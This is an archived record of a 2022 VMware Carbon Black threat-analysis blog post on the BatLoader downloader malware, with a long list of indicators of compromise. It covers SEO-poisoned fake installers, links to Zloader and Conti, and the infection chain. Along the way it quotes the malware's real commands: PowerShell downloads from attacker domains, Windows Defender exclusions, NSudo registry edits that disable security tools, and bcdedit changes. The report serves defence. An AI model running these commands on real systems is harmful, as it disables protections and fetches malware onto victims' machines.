{
	"id": "e07bb547-45e1-4fc2-bb8a-571e8088352d",
	"created_at": "2026-04-06T00:07:29.080797Z",
	"updated_at": "2026-04-10T03:20:38.453718Z",
	"deleted_at": null,
	"sha1_hash": "6f0812339446d96b5d0fdf215df61af6d4e5d875",
	"title": "BATLOADER: The Evasive Downloader Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2819322,
	"plain_text": "BATLOADER: The Evasive Downloader Malware\r\nBy Bethany Hardin, Lavine Oluoch, Tatiana Vollbrecht\r\nPublished: 2022-11-14 · Archived: 2026-04-05 18:06:37 UTC\r\nContributors: Deborah Snyder and Nikki Benoit\r\nExecutive Summary\r\nVMware Carbon Black Managed Detection and Response (MDR) analysts are constantly handling security incidents\r\nwithin our customer environments and tracking emerging and persistent malware campaigns. One such threat that has\r\nbeen particularly prevalent over the last couple of months is BatLoader.  Named by Mandiant [1], BatLoader is an\r\ninitial access malware that heavily uses batch and PowerShell scripts to gain a foothold on a victim machine and\r\ndeliver other malware. The threat actors utilize search engine optimization (SEO) poisoning to lure users to download\r\nthe malware from compromised websites. The use of living-off-the-land binaries makes this campaign hard to detect\r\nand block especially early on in the attack chain.\r\nIn this article, we will explore this malware campaign, addressing the history of BatLoader, its attributes, how it is\r\ndelivered, the infection chain, and Carbon Black’s detection of the malware.\r\nAttributes and Attribution\r\nThere are several attributes that are unique to BatLoader’s attack methodology that Carbon Black’s MDR team has\r\nseen in infected customer environments. The following can be used as a fingerprint to identify the malicious files\r\n(based on the OLE file information provided by VT):\r\nAuthor Signer Subject\r\nSoftland MK Investment Properties Novapdf 11 tools\r\nTest Tax In Cloud sp. z o.o. SetupProject1\r\nCloud Kancelaria Adwokacka Adwokat Aleksandra Krzemińska Cloud\r\nTable 1: OLE File information for identified Batloader samples \r\nOther fingerprints pulled from the code can also be used to identify BatLoader files:\r\n1\r\nSet-Location “$Env:USERPROFILE\\AppData\\Roaming”\r\nInvoke-WebRequest hxxtps://updatea1[.]com/g5\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 1 of 19\n\n2\r\nSet-Location “$Env:USERPROFILE\\AppData\\Roaming”\r\nInvoke-WebRequest hxxp://cloudupdatesss[.]com\r\nWhile researching BatLoader, the team discovered several attributes within the attack chain that are similar to\r\nprevious activity linked to Conti. Evidence collected includes an IP address (134[.]0[.]117[.]195 – firsone1[.]online)\r\nthat was previously used by Conti in a ransomware campaign leveraging Log4J [2], as well as techniques that Conti\r\nhas used in other attacks. One of the techniques identified was the use of the Atera agent which has similarities to\r\nConti’s previous techniques for their ransomware operations. Mandiant had previously released research on\r\nBatLoader and commented that activity from BatLoader overlaps with techniques that were released with Conti’s\r\nleaks in August 2021 [1].\r\nThis is not to say that Conti is responsible for BatLoader. Unaffiliated actors may be replicating the techniques of the\r\ngroup, especially since the Conti Leaks of August 2021.  Interestingly, Carbon Black’s MDR and Threat Analysis Unit\r\n(TAU) team did not find BatLoader being sold on the dark web, suggesting this may be a campaign by a single\r\nactor/group and not being sold as a service.\r\nBatLoader vs ZLoader\r\nWhile researching the pre-existing information on BatLoader published on the public internet, there seemed to be\r\nsome confusion as to whether BatLoader and Zloader, a banking trojan, are one and the same. For example, looking\r\nup this file on VirusTotal we see that different antivirus engines group it in the Zloader malware family. The same file\r\nhas been referenced in community-contributed IOC collections for both Zloader and Batloader.\r\nFigure 1: Malware family analysis for a ZLoader Sample from VT\r\nThought to be derived from the Zeus banking trojan from the early 2000s, the Zloader malware has been observed in\r\nhundreds of campaigns over the years, evolving over time and improving its effectiveness against its targeted victims\r\n[3].  In 2021, security researchers reported a change in Zloader’s delivery method as well as key changes in its attack\r\nchain. The malware operators moved away from phishing email campaigns (more information can be found in TAU-TIN ZLoader) and we’re now using malicious advertisements to lure users to download signed Windows installer\r\n(.msi) files. These file downloads are disguised as installers for legitimate software such as TeamViewer, Zoom,\r\nDiscord, JavaPlugin etc. Once installed, Zloader uses batch scripts to progress in the attack chain using the following\r\ntactics:\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 2 of 19\n\nelevating privileges\r\nevading defenses by disabling Defender using Nsudo\r\nestablishing persistence\r\ndownloading additional payloads using the PowerShell cmdlet Invoke-WebRequest.\r\nFinally, the threat actor leverages CVE-2013-3900 and CVE-2020-1599 to execute a malicious script appended to a\r\nsigned Windows dll that injects the main Zloader dll into an msiexec.exe process. Msiexec.exe then maintains\r\ncommunication with the C2 server.  In April 2022, Microsoft’s Digital Crime Unit (DCU) took down over 60 domains\r\nthat were controlled by the threat actor group behind ZLoader, disrupting their botnet [4].\r\nIn many ways, Batloader draws familiarity from the previously known ZLoader. Our team analyzed the initial steps of\r\ncompromise utilizing the two malware samples presented in the chart below to provide an accurate comparison.\r\nMalware File Name SHA-256 Hash\r\nBatLoader zoom.msi 3ec3c66c0099682250fe06db400f42ec7be9a0f4641eaad8473ccd8b28a48042\r\nZLoader\r\nzoom.msi / Team-viewer.msi\r\n2c0d8fc0740598fa97c5d1b21edb011c8026740b77029d29c20f3275438ebfbd\r\nWhere these two malware types draw substantial similarities is through their use of SEO poisoning, leveraging\r\nWindows Installer, and their use of the native OS binaries during the attack delivery process.\r\nFigure 2: Powershell command from Zloader \u0026 Batloader samples\r\nWith these similarities, we cannot conclude that these malware variants are entirely separate from each other, and of\r\nfurther note, some of the collected samples of Batloader and ZLoader both had an identical creation date and time\r\nwithin the file’s OLE metadata.\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 3 of 19\n\nFigure 3:  OLE comparison for Batloader and ZLoader Hash from VirusTotal\r\nDespite the resemblance between Batloader and Zloader, there are some differences worth noting. On average,\r\nBatloader samples are larger at ~107 MB while ZLoader is only about ~705 KB.  This is consistent with the amount\r\nof activity that is seen with Batloader from the start.\r\nWhile it could not be verified whether or not the two malware variants are linked to the same threat actors, based on\r\nthe used malicious code and shifts in attack delivery methods, our team’s findings align with Walmart [5] and\r\nMandiant [1] that BatLoader is indeed an extension beyond ZLoader.\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 4 of 19\n\nFigure 4: Comparing ZLoader (most recent campaign) and BatLoader attack chain\r\nBatLoader Delivery\r\nNote: Batloader continues to evolve and we have seen different execution steps from different samples. Although the\r\ncore functionality remains the same, the malware operators use different scripts (both in name and content) possibly\r\nto make detection more difficult. For simplicity, we only analyzed one of the three variations we encountered. The\r\nIOC section below lists scripts and tools used in all the different attack chains. \r\nThe operators of BatLoader malware leverage SEO poisoning to lure potential victims into downloading malicious\r\nMicrosoft Windows Installer (.msi) files.  The msi files can either be directly downloaded, often found in the\r\n/Downloads folder or are included in a .zip archive file.  The files masquerade as other common legitimate software\r\ninstallers – e.g. zoom.msi, Teamviewer.msi, anydesk.msi – but are actually a copy of the free PDF creator novaPDF.\r\nThe novaPDF installer is edited using the tool Advanced Installer to add a PowerShellScriptInline custom action that\r\nexecutes a malicious PowerShell script.  More on how to create PowerShell custom actions with Advanced Installer\r\ncan be found here.\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 5 of 19\n\nFigure 5:  Zoom.msi custom action\r\nThe PowerShell inline script kicks off the infection when executed during software installation, downloading the first\r\nBatLoader script, update.bat using the cmdlet Invoke-WebRequest as shown in Figure 6.\r\nFigure 6:  PowerShellScriptInline custom action data represents the PowerShell code\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 6 of 19\n\nFigure 7: Extracted PowerShell code\r\nInfection Chain\r\nThe infection chain relies on batch scripts and PowerShell scripts written to the \\appdata\\roaming directory to gain\r\ninitial access. update.bat downloads requestadmin.bat and nircmd.exe, a command line utility that can be used to gain\r\nadmin privileges with the “elevate” and “elevatecmd” switches.\r\nFigure 8:  Contents of Update.bat\r\nNircmd.exe and the initial zoom.msi file are both signed with the same certificate. We have identified three file\r\nsignatures related to BatLoader files at the time of writing this:\r\nMK Investment Properties Inc.\r\nKancelaria Adwokacka Adwokat Aleksandra Krzemińska\r\nTax in Cloud sp. Z o.o\r\nWith elevated privileges, requestadmin.bat downloads and executes runanddelete.bat and scripttodo.ps1.  For defense\r\nevasion, requestadmin.bat also adds exclusions for Windows Defender as listed below:\r\nAdd-MpPreference -ExclusionProcess ‘C:\\Users\\\u003cuser\u003e\\AppData\\Roaming‘\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 7 of 19\n\nAdd-MpPreference -ExclusionPath ‘C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\’\r\nAdd-MpPreference -ExclusionPath ‘C:\\Users\\\u003cuser\u003e\\‘\r\nAdd-MpPreference -ExclusionProcess ‘C:\\Users\\\u003cuser\u003e‘\r\nAdd-MpPreference -ExclusionProcess ‘C:\\Windows*‘\r\nAdd-MpPreference -ExclusionExtension “.ps1″”\r\nAdd-MpPreference -ExclusionPath ‘C:\\Users\\\u003cuser\u003e‘\\AppData\\Local\\Temp\\*’\r\nAdd-MpPreference -ExclusionProcess ‘C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\*’\r\nThe PowerShell script scripttodo.ps1 runs some discovery commands as well as downloading and installing a copy of\r\nGpg4win (an email and file encryption package) and Nsudo.exe, a tool used to launch programs with elevated\r\nprivileges.\r\ncomputersystem get domain\r\narp.exe -a\r\nGpg4win is then used to decrypt more payloads.\r\n“C:\\Program Files (x86)\\GNU\\GnuPG\\gpg2.exe” –batch –yes –passphrase 105b -o C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Roaming\\d2ef5.exe -d C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\d2ef5.exe.gpg\r\n“C:\\Program Files (x86)\\GNU\\GnuPG\\gpg2.exe” –batch –yes –passphrase 105b -o C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Roaming\\p9d2s.exe -d C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\p9d2s.exe.gpg\r\n“C:\\Program Files (x86)\\GNU\\GnuPG\\gpg2.exe” –batch –yes –passphrase 105b -o C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Roaming\\f827.dll -d C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\f827.dll.gpg\r\n“C:\\Program Files (x86)\\GNU\\GnuPG\\gpg2.exe” –batch –yes –passphrase 105b -o C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Roaming\\d655.dll -d C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\d655.dll.gpg\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 8 of 19\n\nFigure 9: Contents of runanddelete.bat from VT\r\nNsudo is used to impair defenses by adding the registry values ConsentPromptBehaviorAdmin\r\n,Notification_Suppress, DisableTaskMgr, DisableCMD and DisableRegistryTools. These configurations restrict user\r\naccess on the infected device making remediation difficult.\r\nNsudo -U:T sc config WinDefend start= disabled\r\nNSudo -U:T -ShowWindowMode:Hide reg add\r\n“HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System” /v “ConsentPromptBehaviorAdmin” /t\r\nREG_DWORD /d “0” /f\r\nNSudo -U:T -ShowWindowMode:Hide reg add “HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\UX\r\nConfiguration” /v “Notification_Suppress” /t REG_DWORD /d “1” /f\r\nNSudo -U:T -ShowWindowMode:Hide reg add\r\n“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System” /v “DisableTaskMgr” /t REG_DWORD /d\r\n“1” /f\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 9 of 19\n\nNSudo -U:T -ShowWindowMode:Hide reg add\r\n“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System” /v “DisableCMD” /t REG_DWORD /d “1” /f\r\nNSudo -U:T -ShowWindowMode:Hide reg add\r\n“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System” /v “DisableRegistryTools” /t REG_DWORD\r\n/d “1” /f\r\nNSudo -U:T -ShowWindowMode:Hide reg add\r\n“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer” /v “NoRun” /t REG_DWORD /d “1” /f\r\nNsudo -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No\r\nNsudo -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures\r\nRequestadmin.bat also uses powercfg.exe to modify power settings on the infected device by configuring the lock\r\nscreen timeout.\r\npowercfg.exe /SETACVALUEINDEX SCHEME_CURRENT SUB_VIDEO VIDEOCONLOCK 1800\r\npowercfg -change -standby-timeout-dc 3000\r\npowercfg -change -standby-timeout-ac 3000\r\nBatloader has also been observed installing remote monitoring software such as Servably’s Syncro and Atera RMM.\r\nThis ensures the malware operators maintain access to the infected systems.\r\nThe final payloads dropped after infection often include two executables (e.g. d2ef5.exe, p9d2s.exe) and a DLL file\r\n(e.g. f827.dll, d655.dll). Within each of the infections we observed, one of the executable files was a known bad\r\nattributed to the Ursnif/Gozi malware family, a banking trojan. The other appeared to be Arkei/Vidar infostealer. Once\r\nthese executables are set to run, the main dll is also executed. In some incidents, we were able to confirm that the dll\r\nwas a Cobalt Strike stager.\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 10 of 19\n\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 11 of 19\n\nFigure 10: Final DLL payload executed\r\nVMware Carbon Black MDR Response\r\nNew threats are constantly emerging. At VMware Carbon Black we work around the clock to ensure that our products\r\nkeep our customers safe from those very threats and offer MDR, the last wall of defense, to fill the gap between the\r\nknown, evolving and unknown threats.\r\nBatloader is a great example of the benefit of our MDR product. As our team has detailed, this malware variant is\r\nmuch stealthier and embeds itself quite thoroughly within the impacted host device. The Carbon Black sensor is able\r\nto detect specific behaviors of the malware and generate alerts for further analysis. The alerts in themselves did not\r\npaint a holistic picture of the attack. This would be a challenge for any team that does not have the resources to\r\nconduct an in depth threat hunt such as those provided by MDR.\r\nThe Endpoint Standard product receives updates for known malicious hashes and blocks all types of Known or\r\nSuspect malware files from executing through behavioral analysis. While the initial payload may be able to\r\ncircumvent detection, it is highly likely that when the malware runs it will trigger other alerts that are indicators of a\r\nmore complex attack, such as the ones highlighted below.\r\nFigure 11: Alert triggered by requestadmin.bat artifact from Batloader malware\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 12 of 19\n\nFigure 12: Alert triggered by the d2ef5.exe artifact from Batloader malware\r\nMDR Threat Analysts detected this change in tactics and initiated the investigation that has brought us to this point of\r\nhighlighting the nuances and vital differences between Batloader and Zloader and how it could impact our customer\r\nenvironments. The discovered IOCs related to this malicious behavior is documented to ease the next steps for our\r\ncustomers with Threat Analysts always available for follow-up questions and support.\r\nConclusion\r\nBatLoader’s stealth and persistence are what made this malware stand out from the rest during its latest campaign.\r\nThe MDR team has been highly successful in detecting these attacks, utilizing the written detections within the\r\nCarbon Black sensor and carefully crafted queries that would confirm whether or not the malware is related to\r\nBatLoader. As this variant has a focus on persistence, if it was able to successfully infect the host, it would be vital to\r\nperform the necessary analysis to fully remove the malware or restore from a known good backup.\r\nObserved as early as July of 2022, this malware has already become commonplace as a threat against Carbon Black\r\nMDR customers. The following diagram illustrates its prevalence across different sectors, with business and financial\r\nservices being prime targets. Since it was first observed by the VMware Carbon Black team there have been at least\r\nthree waves of infection to date with more to be expected.\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 13 of 19\n\nFigure 13: Attack prevalence across industries as seen by Carbon Black\r\nThis proves once again that as the threat landscape continues to change, the security industry as a whole needs the\r\ntools, knowledge, and collaboration to be able to detect and block the latest discovered techniques.  Here at VMware\r\nCarbon Black, the MDR team and TAU heavily rely on communication and collaboration to ensure that our products\r\nare able to stand against these threats as they continue to evolve in a timely manner. Our teams measure our success\r\nthrough our ability to adapt and persevere on this ever-changing battlefield.\r\nIndicators of Compromise (IOCs)\r\nIndicator Type Context\r\n3ec3c66c0099682250fe06db400f42ec7be9a0f4641eaad8473ccd8b28a48042\r\nSHA-256\r\nzoom.msi\r\n15c39d2084e399b4a0126c0b1026bd2342f8dc5d812cf0d0caae8e35ee689407\r\nSHA-256\r\nanydesk.msi\r\nd0d53132fc9db8c4829769e222d70f25db9740239ac898ee30fad4a89a1197e5\r\nSHA-256\r\nndp48-x86-x64.msi\r\n661989f7dedd6a9bd37a69a3c80d6b308b1c704262e8bfc49ea5df45dbd0fce0\r\nSHA-256\r\nputty12.1.msi\r\n9f017523e594c20c536e14b8c3a9bf5932c8a8853b5bdda4e16e9fbd251c72b5\r\nSHA-256\r\nndp48-x86-x64.msi\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 14 of 19\n\nbbbd869ada2a931528437ddfb1626f9705867036131f20db7a9b09318e593638\r\nSHA-256\r\nsetup_iid_1c7a5958-\r\n03ff-4772-915d-8281b496fe116_14.msi\r\need32513227a87faa2439b2217df1c965f9d5cbbf2e3a2b5bac1322c634038da\r\nSHA-256\r\nzoominstaller70.0.msi\r\n0c2c349c4f1c420d9810a7a6870d19558542ae9b7233cd4e5ce2142bf381d6b4\r\nSHA-256\r\naudacity-win12.6.msi\r\n1d28ab9852d42bdf12599fd612691a8a68d73b03d80ddcd7aebf49dad2ea05b5\r\nSHA-256\r\ninstallerv9.0.msi\r\n3ef74a6f1e2372daffc3ef4c98e0b9bb08e22a684c2d1bb8007eb2ba372654a2\r\nSHA-256\r\nzoominstaller65.0.msi\r\n2a33d171c7b46d2905e1a2a2ac8e2e29a70b811e6ab9cc0c06c06897761e07a0\r\nSHA-256\r\ninstallerv8.4.msi\r\n2ade09e144760d229a01b8f0c53ce60586f11c449e6fbfccd2fcf72e2cc6a484\r\nSHA-256\r\nzoominstaller68.0.msi\r\n5fac5e0e79369db0b39346160644d5c29f88ed615e03c947116240f5fc5b05a1\r\nSHA-256\r\ninstallerv20.6.msi\r\nacdbd6901ecb04106e7427af8602ac8473042b86f15a36bbdbd6bf04010b0602\r\nSHA-256\r\nzoominstaller60.7.msi\r\n7ba7e1084c6fd760db2ef90fd00177fa72fad00286c39f8f13b52f34adbf9a2c\r\nSHA-256\r\nzoominstaller60.5.msi\r\nded683fa45879dc8c1b702122dd46d6eeb234972367a0015b0207d7540a9c1fc\r\nSHA-256\r\ninstallerv8.4.msi\r\ne7c5fc948cfe3ff394d1ff9712995a77add82a5c507ce98debc722c06e3f1334\r\nSHA-256\r\ninstallerv9.0.msi\r\n366151721ca41fe0227d34bbd3eda544774df24fb7d00c62dcd119519f8b9782\r\nSHA-256\r\ninstallerv20.9.msi\r\n1faf88c503380c21f4817d8f2d41d62954be114233750223824b2757aa8d2d81\r\nSHA-256installerv40.1\r\n(117).msi\r\n4a27ced8592150fc2c74f3826cca90988633eb8f8723655152df521f88a039df\r\nSHA-256\r\ninstaller36.5 (38).msi\r\n89e1a688f88b38f256c9c17d0bcf5ecd12428a845e136d10a9a13579018e076f\r\nSHA-256\r\ninstaller36.5 (37).msi\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 15 of 19\n\ne59c2defd5a04095a36b8ffd8893f694bcf8583bf967958a4a41d7161871d399\r\nSHA-256\r\ninstaller36.5 (4).msi\r\ndc6b6e1812f41c80ee67a72ebcb7a999488c866d805354936fb7506667005b43\r\nSHA-256\r\npssabfa.ps1\r\n5107ee907be6011f76a1e984a12ae2f56ccf6329cba7243ef9f2b50198839193\r\nSHA-256\r\nupdate.bat\r\n2a9df5806d4af0072cb6f76c7d8ebcde7fca51a0ee13f609f5a492c78d449080\r\nSHA-256\r\nupdate.bat\r\n1dc84699521090843fc320deccf157537de7eae6d52db4f78acde01bc106a90c\r\nSHA-256\r\nupdate.bat\r\n1fd5bbe5af7a7dcc52d5ea12e4d32c4818b2ef482de18f6c1b7cfda0986b1ee2\r\nSHA-256\r\nupdate.bat\r\n447ec30c17c97fa67a21477e48aa66d6228ec46f604d8679fd4021d134cca7f8\r\nSHA-256\r\nupdate.bat\r\n39b771a51c479187d089b9e42d67b6cee24607e197ba75549e9dad58163bc595\r\nSHA-256\r\navolkov.exe\r\naf64e4bccc5652b8f780e39e7e27d2d1f27b0395e0c646d4953b354b70eb54bf\r\nSHA-256\r\nnewtest.bat\r\n9b6c2ed7ace21dc83cbd46b08acd3f73460c70735568e9fbd7bd7c8868cd8d27\r\nSHA-256\r\nuser.ps1\r\n591aa2607abc384c66d1532c1b6d4cc3d4052108245b03e3b6fea19a207c13d5\r\nSHA-256\r\nuser.ps1\r\n528e2be7188d1b337d0691b5c21618425afdb594139205accd2137313bbf1cfe\r\nSHA-256\r\nmun.ps1\r\n0911be79c918c04b7409f8cb5964f5dfed327f1f23fd326011a217987bdcb5f8\r\nSHA-256\r\nru.ps1\r\n04be8439fabc28959d7c109521e9eb4854f2a24402aacc4c3fb981e286fb5fa2\r\nSHA-256\r\ncheckav.ps1\r\nc737c388bab2b626e6a71eb8c2d8c68f2aca78e183233ea9a7c8e3fb1240ce94\r\nSHA-256\r\ncheckav.ps1\r\ne9282d53092385c81dec89bb99e9394e77c1ecce6ca20340b360bd46b146bf9f\r\nSHA-256\r\ncheckav.ps1\r\n216047c048bf1dcbf031cf24bd5e0f263994a5df60b23089e393033d17257cb5\r\nSHA-256\r\nnircmd.exe\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 16 of 19\n\na6d46ae0d796fd3f90364058d67947f9caa2b7c75aa3b1695bbe10406ea1356c\r\nSHA-256\r\nnircmd.exe\r\nae43e9e943e21ce2f7bd1db0c17f1ba8fd9b4d0fbd2a26f947627f19b0268da2\r\nSHA-256\r\nrequestadmin.bat\r\n96a82b93dd26cc7126c07403c8a1689b9407dd37459c7935cab8ea6c528a219a\r\nSHA-256\r\nrequestadmin.bat\r\na390f289566d2cf19f9afcad9b51497925e910e38068c2059896f15bbe3bcee7\r\nSHA-256\r\nrequestadmin.bat\r\n161302d0fa5608fe7f2cb81d84af309fa2e3aed09b46c548116f0155af396f80\r\nSHA-256\r\nrequestadmin.bat\r\n342b398647073159dfa8a7d36510171f731b760089a546e96fbb8a292791efee\r\nSHA-256\r\nrunanddelete.bat\r\n5cd720b63b8383ed6cc3f3f97954bd029120cdf34b23bf222cd8af3f048b112b\r\nSHA-256\r\nscripttodo.ps1\r\n3c05ba5d8579c7684d799898e97861691a7828bed48a1e6261b2e1cd550fe275\r\nSHA-256\r\nscripttodo.ps1\r\n4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce\r\nSHA-256\r\nscripttodo.ps1\r\ndd3e298fa01b7a035ed28b5649b4a7656be11c5a4c5dbb57b4919f4e9d837cb8\r\nSHA-256\r\nscripttodo.ps1\r\n7d621bfbe4b32647abcd8216cd65be56aaf68d674bedc1094519562a8604a0e0\r\nSHA-256\r\nscripttodo.ps1\r\n8e068fdc1deb02dc8056215fe3c400185845742d0227af7923483f891d62516c\r\nSHA-256\r\nscripttodo.ps1\r\nd62f9aa79ce6a406a6e5f13cd47fd1127c1f743010871724870e124ce57898f3\r\nSHA-256\r\nscripttodo.ps1\r\n19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618\r\nSHA-256\r\nnsudo.exe\r\n43894c287c3ebccd30cd761dd4826518073773180ae0ab28355d604b44071441\r\nSHA-256\r\ngpg4win-2.2.5.exe\r\n208d26c07914e54a5f1575d3720effb6b04cded65942a500d000bef2ce4e5843\r\nSHA-256\r\ngpg2.exe\r\na5af9aac1a7675fd3e3da75508d67d33827ae43b1f42dbdefc0d9a62915fa775\r\nSHA-256\r\nshutdowni.bat\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 17 of 19\n\nbc98d852e5e1662ae8ca1f95b1d1d49f61c6b64024af04b1e4665d0247ec1de5\r\nSHA-256\r\nf827.msi (AteraAgent)\r\n3503b5ca3d8070342d1f3c49efa44fd14d7f773f51d3bd5b1ded1aa19f9ed3e7\r\nSHA-256\r\nAteraAgent\r\n5654f32a4f0f2e900a35761e8caf7ef0c50ee7800e0a3b19354b571bc6876f61\r\nSHA-256\r\nf827.exe\r\n(Syncro RMM)\r\n9f3afef4b3a589c4685f39d887725a664ec0fe78091069550402365e589f9d22\r\nSHA-256\r\nd2ef5.exe\r\n1056ea3dad265dd554362bc0bd67f08fa2b9f3e5839e6e4fb197831a15c8acef\r\nSHA-256\r\nd2ef5.exe\r\n28a57a6a28080eb1374d88cca07b38fb645c558ad30d4d51929d8567dedf5021\r\nSHA-256\r\nd2ef5.exe\r\nc1c4adf68455620082889b4c8576110441f6f2c7876240bc3f41f5cea8050370\r\nSHA-256\r\nd2ef5.exe\r\n1be4782dc3839c4ab537b7d5ce80601334de1d84f4be455db7c80b4ae3ec51ce\r\nSHA-256\r\np9d2s.exe\r\n72504c07e6105b70500519f3bcf718d3113624560c5594e87c08a4efc2e2a1a8\r\nSHA-256\r\np9d2s.exe\r\n22d5bac1b0cad7ee531f4a156dda677d1cb52ec6512154d42e7bdcef5cc9cc48\r\nSHA-256\r\np9d2s.exe\r\nb8f294bb3793eee72ab2d2bc436b18fe1c111704405688b43b686f83f0f0b8d0\r\nSHA-256\r\np9d2s.exe\r\n9cead0a2b8d586a8e2edde7aefe1e106a9894a95f9b251746442c7fbfe99df61\r\nSHA-256\r\np9d2s.exe\r\n1fe47cac924700a847e669f1d968d73d08fcd39fc3fa03f63035d78769374a40\r\nSHA-256\r\nd655.dll\r\n1b277b89ee84148bd5beebcbdb69b9e5f82f3ce4d1dec4b459217323aec7fd60\r\nSHA-256\r\nd655.dll\r\n54e844b5ae4a056ca8df4ca7299249c4910374d64261c83ac55e5fdf1b59f01d\r\nSHA-256\r\nf827.dll\r\n1daef45653406893cf3f53e0b80f4aa9c83d6a0e8288bd4c5f7e0318096621a0\r\nSHA-256\r\ninstallv2.dll\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 18 of 19\n\n89.108.65[.]136\r\nIP\r\nAddress\r\nupdatea1[.]com\r\n146.112.61[.]107\r\nIP\r\nAddress\r\nupdatea1[.]com\r\n194.67.110[.]215\r\nIP\r\nAddress\r\nexternalchecksso.com\r\n194.67.119[.]190\r\nIP\r\nAddress\r\ncloudupdatesss[.]com\r\n194.135.24[.]245\r\nIP\r\nAddress\r\nteenieshopus[.]com\r\n139.60.161[.]74\r\nIP\r\nAddress\r\nliversofter.com\r\nReference List\r\n[1]    N. C. Kiat, A. Del Rosario, M. Co. “Zoom For You — SEO Poisoning to Distribute BATLOADER and Atera\r\nAgent.” Mandiant. https://www.mandiant.com/resources/blog/seo\r\n-poisoning-batloader-atera (accessed October, 2022).\r\n[2]    L. Ilascu. “Conti ransomware uses Log4j bug to hack VMware vCenter servers.” Bleeping Computer.\r\nhttps://www.bleepingcomputer.com/news/security/conti-ransomware-uses-log4j-bug-to-hack-vmware-vcenter-servers/\r\n[3]    D. Schwarz, M. Mesa, Proofpoint Research Team. “ZLoader Loads Again: New ZLoader Variant Returns.”\r\nProofpoint. https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns (accessed October, 2022).\r\n[4]    A. Hogan-Burney. “Notorious cybercrime gang’s botnet disrupted.” Microsoft. https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware\r\n-ukraine/ (accessed October, 2022).\r\n[5]    J. Reaves, J.Platt. “Revisiting BatLoader C2 structure.” Walmart Global Tech Blog.\r\nhttps://medium.com/walmartglobaltech/revisiting-batloader-c2-structure-52f46ff9893a (accessed October, 2022)\r\nSource: https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html"
	],
	"report_names": [
		"batloader-the-evasive-downloader-malware.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434049,
	"ts_updated_at": 1775791238,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6f0812339446d96b5d0fdf215df61af6d4e5d875.pdf",
		"text": "https://archive.orkl.eu/6f0812339446d96b5d0fdf215df61af6d4e5d875.txt",
		"img": "https://archive.orkl.eu/6f0812339446d96b5d0fdf215df61af6d4e5d875.jpg"
	}
}